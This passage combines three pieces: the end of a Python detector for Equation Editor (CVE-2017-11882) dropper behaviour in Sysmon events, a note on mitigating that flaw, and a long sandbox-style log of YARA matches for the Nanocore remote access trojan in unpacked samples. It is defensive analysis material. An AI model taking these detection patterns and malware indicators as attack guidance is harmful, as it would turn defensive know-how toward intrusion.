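    alerts = []
    for ev in events:
        if ev["EventID"] == 11 and _is_eqnedt(ev["Image"]):
            target = ev["TargetFilename"]
            if _looks_executable(target, ev.get("Header", b"")):
                # A PE under a user-writable directory is the classic dropper pattern.
                sev = "high" if any(d in target.lower() for d in USER_WRITABLE) else "medium"
                alerts.append(("eqnedt32_dropped_pe", sev, target))
        elif ev["EventID"] == 1 and _is_eqnedt(ev.get("ParentImage", "")):
            # The Equation Editor has no legitimate reason to spawn anything.
            alerts.append(("eqnedt32_spawned_process", "high", ev["Image"]))
    return alerts


if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(*alert)
```

        On hosts that have the January 2018 Office updates, which removed the Equation Editor, any execution of EQNEDT32.EXE at all is worth an alert. Where the component cannot be removed, Microsoft's documented mitigation for CVE-2017-11882 is to kill-bit the COM server by setting the Compatibility Flags DWORD to 0x400 under HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046} (and the Wow6432Node equivalent on 64-bit Windows), which stops Office from instantiating it from a document.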
        .NET source code contains very large strings
        Source: ALP.exe.2.dr, Forms/mainForm.cs | Long String: Length: 38272
        Source: 3.2.ALP.exe.910000.1.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 3.0.ALP.exe.910000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: smtpsvc.exe.4.dr, Forms/mainForm.cs | Long String: Length: 38272
        Source: 4.0.ALP.exe.910000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 4.2.ALP.exe.910000.14.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 10.2.ALP.exe.910000.1.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 10.0.ALP.exe.910000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 11.0.smtpsvc.exe.be0000.0.unpack, Forms/mainForm.cs | Long String: Length: 38272
        Source: 16.2.smtpsvc.exe.2564e04.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.2564e04.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.358b34e.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.376af3e.32.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.376af3e.32.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.376af3e.32.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.376af3e.32.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3601ae8.28.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3601ae8.28.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.8a0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8a0000.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.21d0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.21d0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3753cdf.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3753cdf.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.230e8a4.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.230e8a4.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.3320184.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.790000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.790000.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.327b34e.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.470000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 16.2.smtpsvc.exe.3590184.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 10.2.ALP.exe.3318cc8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.820000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.820000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3753cdf.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3753cdf.31.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3753cdf.31.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 14.2.ALP.exe.33247ad.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 3.2.ALP.exe.34f8cc8.6.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.24b88bc.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.24b88bc.22.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.3601ae8.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3601ae8.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.7c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.7c0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 17.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.8b0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8b0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.2304c9f.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.2304c9f.18.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24ac674.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.24ac674.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.820000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.820000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.8c0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.8c0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24b88bc.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.24b88bc.22.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.ALP.exe.24b88bc.22.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 4.2.ALP.exe.3606787.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.ALP.exe.3606787.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
